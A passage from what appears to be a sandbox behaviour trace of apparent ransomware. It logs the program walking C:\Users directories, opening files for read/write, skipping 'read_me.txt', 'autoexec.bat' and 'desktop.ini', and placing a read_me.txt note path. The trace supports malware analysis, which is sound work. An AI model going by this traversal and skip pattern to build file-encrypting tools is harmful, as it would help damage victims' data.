ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 33 [0073.977] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x280000, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0073.977] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x280000, cFileName="Default", cAlternateFileName="")) returned 1 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default") returned 20 [0073.977] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0073.977] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.977] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0073.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x770 [0073.977] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0073.977] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0073.977] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0073.977] CloseHandle (hObject=0x770) returned 1 [0073.978] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Public", cAlternateFileName="")) returned 1 [0073.978] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0073.978] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.978] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\read_me.txt") returned 24 [0073.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\read_me.txt" (normalized: "c:\\users\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x770 [0073.978] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.978] CloseHandle (hObject=0x770) returned 1 [0073.978] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x169903f0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x169903f0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x169903f0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.978] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.978] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\read_me.txt") returned 24 [0073.978] GetProcessHeap () returned 0x280000 [0073.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0073.978] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 34 [0073.978] GetProcessHeap () returned 0x280000 [0073.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80120 | out: hHeap=0x280000) returned 1 [0073.978] GetProcessHeap () returned 0x280000 [0073.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0073.978] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 35 [0073.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.978] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\.") returned 35 [0073.978] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.978] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\..") returned 36 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="AppData", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned 41 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned 50 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16a28970, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a28970, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Contacts", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 42 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Cookies", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned 41 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ac0ef0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ac0ef0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 41 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4a37910, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4a37910, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 43 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned 43 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned 43 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Links", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned 39 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned 48 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4aa9d30, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4aa9d30, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="Music", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 39 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned 46 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="NetHood", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned 41 [0073.979] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0073.979] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0073.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.980] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0073.980] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0073.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.980] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0073.980] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0073.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.980] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0073.980] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0073.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.980] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0073.980] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0073.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.980] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0073.980] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0073.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.981] 